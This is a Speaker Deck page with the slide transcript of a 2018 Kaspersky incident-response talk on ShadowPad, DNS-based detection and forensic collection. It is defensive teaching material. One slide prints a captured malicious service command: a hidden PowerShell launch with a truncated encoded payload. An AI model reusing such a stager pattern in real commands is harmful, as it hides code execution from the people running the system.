Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=47 DC7499
February 10, 2018
Education
0
320

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=128

DC7499

February 10, 2018
Tweet

More Decks by DC7499

See All by DC7499
Sergey Sobko - Hackashop: Hackathon + Pentest + Workshop [RU]
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
290
Dmitry Sklyarov - Intel ME: Security keys Genealogy, Obfuscation and other Magic
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
180
Anton Lopanitsyn - Initial reconnaissance of web applications.
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
230
Dmitry Volkov - Private messengers: without pain??
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
200
Andrey Skuratov and Sergey Migalin - DNS tunneling in 2018. What is that, and what to do with it?
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
170
Sergey Belov - Another side of Bug Bounty programs
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
200
Dmitry Sklyarov - Intel ME: Flash file system explained
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
300
Maxim Goryachiy & Mark Ermolov - Inside Intel Management Engine
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
360
Kupreev Oleg & Putin Vladimir - Your very own driver for the custom NVMe device from the scratch: reading of the flash memory of iPhone 7
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
390

Other Decks in Education

See All in Education
Metzitli
Ec7e2e57309d7591587a8ac1836614d5?s=48 marieffs
0
150
How learning Chinese made me a better Python instructor
4ef16ff17bbfb331c657d584ea0dc135?s=48 reuven
0
330
多様なメンター、多様な基準
Fffb9af58e08cf384f2a8c1c40c3d38d?s=48 yasulab
4
14k
0615
8c6c4d64f6fd9e19226ef0b210433fd3?s=48 cbtlibrary
0
110
數學、程式和機器
Fa69ad98c55c859259ac3df21698f5fc?s=48 ccckmit
1
610
東京大学深層学習(Deep Learning基礎講座2022)深層学習と自然言語処理
E75f95452aa223da3346062625346bef?s=48 verypluming
25
19k
Virtual and Augmented Reality - Lecture 10 - Next Generation User Interfaces (4018166FNR)
1135dc242dcff3b90ae46fc586ff4da8?s=48 signer
PRO
0
660
ITエンジニアも経営スキルを身につけよう 第2回
227e9b3b0bf93a6c52874004a3ae20eb?s=48 lsuzuki
2
190
使える!数学!応用数学入門 / Introduction of applied mathematics
204f36383109212baaedfabb8abcfc9e?s=48 konakalab
0
380
My toolbox is full of shiny tools, do I also need super powers?
81689b093f75cf3f383e581ca57188df?s=48 minecr
0
130
ITエンジニアも経営スキルを身につけよう 第3回
227e9b3b0bf93a6c52874004a3ae20eb?s=48 lsuzuki
0
170
0622
8c6c4d64f6fd9e19226ef0b210433fd3?s=48 cbtlibrary
0
120

Featured

See All Featured
Designing for humans not robots
D36d2c1821af9249b69ff7f5ed60529b?s=48 tammielis
241
24k
Practical Orchestrator
168ccec72eee0530b818d44f3fedaacf?s=48 shlominoach
178
8.7k
The Brand Is Dead. Long Live the Brand.
A415db3ac9e9668acbc1fb36eead84ac?s=48 mthomps
46
2.7k
Atom: Resistance is Futile
7fa6101cd43067653cf4ac6c7ca54305?s=48 akmur
255
20k
The World Runs on Bad Software
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
57
5.4k
Java REST API Framework Comparison - PWX 2021
72a2082c6a4dd79ad68befb3db911616?s=48 mraible
PRO
11
4.8k
Designing for Performance
245cee81a9c424266e5e401d844ea881?s=48 lara
597
63k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
5b9fe87ec1faa67a4599782930f45ec9?s=48 sstephenson
151
13k
How to name files
0a4f62e90c976eeb44d33add75cca5af?s=48 jennybc
40
63k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
F383c6a4dc55e331bbe2987b622cee6b?s=48 stephaniewalter
269
12k
Pencils Down: Stop Designing & Start Developing
79acae287842acf29084005533a7fb3b?s=48 hursman
113
9.8k
10 Git Anti Patterns You Should be Aware of
Dafc4723e9a1c067796c0fec6f509774?s=48 lemiorhan
638
52k

Transcript

  1. Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky

    Lab

  2. Challenge: find a SDC bus speed

  3. None

  4. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  5. 1.Shadowpad

  6. Case overview: 1.Antifraud system in a bank is detecting printing

    of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…

  7. DNS requests

  8. None
  9. None

  10. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

  11. https://securelist.com/shadowpad -in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2.0x403AA91EE

  17. Case overview:

  18. None
  19. None

  20. How to find suspicion DNS requests? sort | uniq -c

    | sort -rn

  21. How to find suspicion powershell? sort | uniq -c |

    sort -rn

  22. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA

  23. https://github.com/KasperskyLab/ForensicsTools/

  24. 3.Scanner2

  25. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!

  26. What to do? we need logs we need mfts we

    need regs

  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicion ? sort | uniq -c

    | sort -rn

  30. https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.

  33. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  34. Зачем?

  35. None

  36. Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab